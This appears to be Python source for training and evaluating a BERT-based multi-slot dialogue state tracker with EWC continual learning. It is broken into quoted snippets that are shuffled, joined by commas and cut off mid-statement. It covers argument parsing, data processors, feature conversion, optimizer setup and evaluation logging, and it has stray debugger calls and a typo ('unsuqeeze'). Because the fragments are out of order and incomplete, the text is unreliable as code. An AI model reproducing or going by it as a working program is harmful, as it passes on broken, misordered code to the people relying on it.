nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot,", "turn index if accumulation: if prev_dialogue_index is None or prev_dialogue_index != line[0]: text_a", "type=str, default=\"cosine\", help=\"The metric for distance between label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4,", "0 for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t in", "0.0, 'lr': args.learning_rate}, ] return optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model)", "== 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step)", "all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\" Num", "transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC model = BeliefTracker(args, num_labels, device) if args.fp16: model.half()", "turn in dialog: text = turn['input'] + '\\t' for label, pred in zip(turn['label'],", "max_turn = 0 for (ex_index, example) in enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn", "using label embeddings. \\n\") parser.add_argument(\"--distance_metric\", type=str, default=\"cosine\", help=\"The metric for distance between label", "if n_gpu > 1: model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1", "power of 2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval", "slot value labels num_labels = [len(labels) for labels in label_list] # Number of", "acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids,", "labels in label_list: token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ##", "= argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True, help='location of the data corpus')", "***\" % (epoch, dev_loss, dev_acc)) #if epoch > 100 and last_update + args.patience", "eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy,", "warmup return 1.0 - x ############################################################################### # Main ############################################################################### def main(): parser =", "%s\" % \" \".join([str(x) for x in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous", "action='store_true', help=\"Whether to run eval on the test set.\") args = parser.parse_args() if", "', '.join(self.target_slot)) def get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")),", "of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to improve fp16 numeric stability. Only", "if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot", "x in input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x) for x in input_len])) logger.info(\"label:", "list of slots in present task # tokenizer vocab_dir = os.path.join(args.bert_dir, '%s-vocab.txt' %", "\" + text_a text_b = line[3] + \" # \" + text_b else:", "all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank ==", "logger.info(\"input_len: %s\" % \" \".join([str(x) for x in input_len])) logger.info(\"label: \" + label_info)", "%s\" % \" \".join([str(x) for x in input_ids])) logger.info(\"input_len: %s\" % \" \".join([str(x)", "else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code ###############################################################################", "[previous slots + present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer,", "prev_dev_acc, global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" %", "i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Validate/Loss_%s\" % slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace('", "= processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length)", "logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\"", "0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs) <", "ontology = json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot ==", "% vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None accumulation = False if", "loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps > 1: loss = loss /", "get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def", "t in batch) input_ids, input_len, label_ids, prev_label_ids = batch if input_ids.dim() == 2:", "prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex =", "prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens:", "input_len, label_ids, prev_label_ids = batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len", "= torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 # Initializes", "(max_seq_length - len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) == max_seq_length features.append((label_token_ids, label_len)) all_label_token_ids", "import FusedAdam except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use", "= dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update,", "for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)", "1: model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() ==", "'\\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]),", "+= prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss", "% output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc =", "into a list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list) def _hard_coding_label(label):", "in enumerate(examples): if max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length)", "sequence classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for", "Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0,", "p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0,", "sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format(", "0 prev_dev_loss = 0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples", "nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot", "separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f: reader = csv.reader(f, delimiter=\"\\t\",", "this will be truncated, and sequences shorter \\n\" \"than this will be padded.\")", "\"pricerange\": slot = \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in", "self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot)) logger.info('Processor: target slots:", "between label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\")", "else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples)", "in key): del_list.append(key) for key in del_list: del ptr_model[key] if n_gpu > 1:", "remove slot_lookup and value_lookup del_list.append(key) if ('rnn.' in key): # rename rnn ->", "and (args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def draw(data, x, y,", "distributed training: {}, 16-bits training: {}\".format( device, n_gpu, bool(args.local_rank != -1), args.fp16)) if", "class InputExample(object): \"\"\"A single training/test example for simple sequence classification.\"\"\" def __init__(self, guid,", "this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The maximum total input turn length.", "type=float, help=\"Proportion of training to perform linear learning rate warmup for. \" \"E.g.,", "all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids)", "\\ = all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples", "in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous label: \" + prev_label_info) curr_dialogue_idx =", "previous tasks class InputFeatures(object): \"\"\"A single set of features of data.\"\"\" def __init__(self,", "features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids = torch.tensor([f.label_id for", "in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account for [CLS] and", "== 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc += class_acc", "parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64,", "\\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu > 1:", "and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\",", "args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else: summary_writer = None fileHandler =", "as np import torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed", "+= 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels", "label_ids, prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len", "'0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard", "help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use CUDA when available\") parser.add_argument(\"--local_rank\",", "padded.\") parser.add_argument(\"--max_label_length\", default=32, type=int, help=\"The maximum total input sequence length after WordPiece tokenization.", "training and evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list = [] rename_list = []", "all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\"", "previous tasks class DataProcessor(object): \"\"\"Base class for data converters for sequence classification data", "axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(),", "summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu == 1:", "json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot == 'all': slot_idx", "a backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit float precision instead of", "for slot in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for the", "get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank != -1: t_total", "= model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ = loss_.mean() acc = acc.mean() acc_slot", "*****\") logger.info(\" Num examples = %d\", len(dev_examples)) logger.info(\" Batch size = %d\", args.dev_batch_size)", "1: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss,", "= ':'.join(prev_slot) else: raise NotImplementedError() # sorting the ontology according to the alphabetic", "for x in range(num_labels[i])] for i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids,", "required=True, help=\"Bert pre-trained model selected in the list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased, bert-large-cased,", "of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list) def _hard_coding_label(label): return 'do not", "if x < warmup: return x / warmup return 1.0 - x ###############################################################################", "nb_eval_examples_prev) for val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item())", "accuracy(out, labels): outputs = np.argmax(out, axis=1) return np.sum(outputs == labels) def warmup_linear(x, warmup=0.002):", "args.lambda_ewc * loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu,", "def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data file into a", "input sequence length after WordPiece tokenization. \\n\" \"Sequences longer than this will be", "label_info += '%s (id = %d) ' % (label, label_map[i][label]) return label_id, label_info", "loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l *", "if any(nd in n for nd in no_decay)], 'weight_decay': 0.0, 'lr': args.learning_rate}, ]", "for i, l in enumerate(loss_slot): eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex if", "in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s", "manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not", "set_type, accumulation=False): \"\"\"Creates examples for the training and dev sets.\"\"\" prev_dialogue_index = None", "training *****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch size = %d\",", "+= acc.item() * nb_eval_ex if loss_slot is not None: if eval_loss_slot is None:", "in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total class accuracy \\t%.3f\\n\" % total_class_acc) logger.info(\"Done", "\"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.target_slot] def get_prev_labels(self): \"\"\"See", "dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total)", "the ontology according to the alphabetic order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items()))", "List of slots in previous task target_slot_id = list(range(len(processor.prev_slot), len(processor.all_slot))) # list of", "in del_list: del ptr_model[key] for key in rename_list: new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key]", "gradient_accumulation_steps parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)", "%(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### #", "DataProcessor(object): \"\"\"Base class for data converters for sequence classification data sets.\"\"\" def get_train_examples(self,", "raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated value file.\"\"\"", "in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot", "> 1: model = torch.nn.DataParallel(model) # Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer", "range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length,", "max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data file into a list of `InputBatch`s.\"\"\" slot_dim", "# trained slots in previous tasks class DataProcessor(object): \"\"\"Base class for data converters", "slots. ex. '0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\", default='tensorboard', type=str,", "float precision instead of 32-bit\") parser.add_argument('--loss_scale', type=float, default=0, help=\"Loss scaling to improve fp16", "all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation *****\")", "# Load pretrained model # in the case that slot and values are", "prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\" Num examples = %d\",", "nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item()", "global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f,", "\"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir,", "is None: eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot * nb_eval_ex", "<= epoch: if last_update + args.patience <= epoch: break ############################################################################### # Evaluation ###############################################################################", "acc=%.6f, Valid prev loss=%.6f, Valid prev acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc,", "= tr_loss / nb_tr_steps if args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy':", "n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) num_valid_turn =", "model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss, loss_slot, acc, acc_slot, _ = model(input_ids,", "all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids", "for idx in self.target_slot_idx] prev_label = [ line[4+idx] for idx in self.prev_slot_idx] examples.append(", "slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len)", "Initializes the distributed backend which will take care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device:", "for [CLS] and [SEP] with \"- 2\" if len(tokens_a) > max_seq_length - 2:", "dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss, 6) if last_update is None or", "or ('value' in key): del_list.append(key) for key in del_list: del ptr_model[key] if n_gpu", "while True: total_length = len(tokens_a) + len(tokens_b) if total_length <= max_length: break if", "eval_accuracy = 0, 0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0,", "***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for x in", "tokenizer, max_turn_length): \"\"\"Loads a data file into a list of `InputBatch`s.\"\"\" slot_dim =", "'%s-vocab.txt' % args.bert_model) if not os.path.exists(vocab_dir): raise ValueError(\"Can't find %s \" % vocab_dir)", "acc_slot * num_valid_turn for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] + l", "pred_slot[0]): if label[0] == -1: break text = {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace('", "= prev_acc_slot.mean(0) num_valid_turn = torch.sum(label_ids[:,:,0].view(-1) > -1, 0).item() dev_loss += loss.item() * num_valid_turn", "loss.item() * nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if loss_slot is not None:", "utterance text_b = line[3] # line[3]: system response label = [ line[4+idx] for", "type=float, help=\"Total number of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float, help=\"The number", "processor.get_labels() # Slot value labels of Present task label_list = prev_label_list + target_label_list", "or args.no_cuda: device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\") n_gpu", "label=None, prev_label=None): self.guid = guid self.text_a = text_a self.text_b = text_b self.label =", "/ nb_eval_examples_prev) for val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot':", "= DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1 for val in label_list]", "input_ids, input_len, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0)", "nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps +=", "<= max_length: break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous", "self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor:", "NotImplementedError() def get_labels(self): \"\"\"Gets the list of labels for this data set.\"\"\" raise", "loss = loss_ + args.lambda_ewc * loss_ewc if args.gradient_accumulation_steps > 1: loss =", "idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss", "nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None: # for multi-gpu eval_loss_slot =", "import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO)", "return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a sequence pair in place", "logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device),", "= [] for label in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"]", "get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot] def _create_examples(self,", "modify learning rate with special warm up BERT uses lr_this_step = args.learning_rate *", "index if accumulation: if prev_dialogue_index is None or prev_dialogue_index != line[0]: text_a =", "args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else: raise", "length after WordPiece tokenization. \\n\" \"Sequences longer than this will be truncated, and", "or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do not train BERT utterance encoder\") ## Other", "and values are different between the training and evaluation ptr_model = torch.load(args.load_path, map_location=device)", "= \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot)", "prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ =", "lines, set_type, accumulation=False): \"\"\"Creates examples for the training and dev sets.\"\"\" prev_dialogue_index =", "n for nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for n,", "the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on the test set.\")", "len(dev_examples)) logger.info(\" Batch size = %d\", args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps)", "\\\"gru\\\" or \\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt ==", "numpy as np import torch from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from", "default=5e-5, type=float, help=\"The initial learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number", "model.to(device) ## Get slot-value embeddings label_token_ids, label_len = [], [] for labels in", "args.learning_rate}, {'params': [p for n, p in param_optimizer if any(nd in n for", "apex.parallel import DistributedDataParallel as DDP except ImportError: raise ImportError( \"Please install apex from", "raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")", "BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") == -1 and args.task_name.find(\"lstm\") == -1: raise ValueError(\"Task", "!= -1: try: from apex.parallel import DistributedDataParallel as DDP except ImportError: raise ImportError(", "Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (last_update, best_loss, best_acc)) else: logger.info(\"*** Model", "text_b = line[3] # line[3]: system response label = [ line[4+idx] for idx", "default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN", "slot in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for slot", "get_train_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def", "default='', type=str, required=True, help=\"Previous trained slots. ex. '0:1:2 or an excluding slot name", "% slot.replace(' ','_'), prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f,", "< 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size", "as plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y", "total_class_acc /= nlabels for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid, slot_acc)) writer.write(\"total", "label_list] incorrect_dialogs = [] attention_draw = 5 for input_ids, input_len, label_ids in tqdm(eval_dataloader,", ")) prev_dialogue_idx = curr_dialogue_idx prev_turn_idx = curr_turn_idx if prev_turn_idx < max_turn_length: features +=", "dev_acc = dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc = prev_dev_acc", "for label in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids =", "select slots to train self.target_slot = [] self.prev_slot = [] self.target_slot_idx = sorted([", "2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids,", "eval on the test set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and", "len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\" Num steps = %d\", num_train_steps)", "embeddings ## Note: slot embeddings are ordered as [previous slots + present target", "+ l * num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i, l in", "Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer = [(n, p) for n, p", "(epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss, 6) if last_update is None", "raise ValueError('nbt type should be either rnn or transformer') from BeliefTrackerSlotQueryMultiSlotEWC import EWC", "np.argmax(out, axis=1) return np.sum(outputs == labels) def warmup_linear(x, warmup=0.002): if x < warmup:", "* nb_eval_ex for l in loss_slot] else: for i, l in enumerate(loss_slot): eval_loss_slot[i]", "ordered as [previous slots + present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot,", "else: tokens_b.pop() ############################################################################### # Miscellaneous functions ############################################################################### def accuracy(out, labels): outputs = np.argmax(out,", "slot idx to train model. ex. '0:1:2 or an excluding slot name 'attraction'\"", "/ nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot", "= tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0] * (max_seq_length - len(label_token_ids)) label_token_ids", "('slot_lookup' in key) or ('value_lookup' in key): # remove slot_lookup and value_lookup 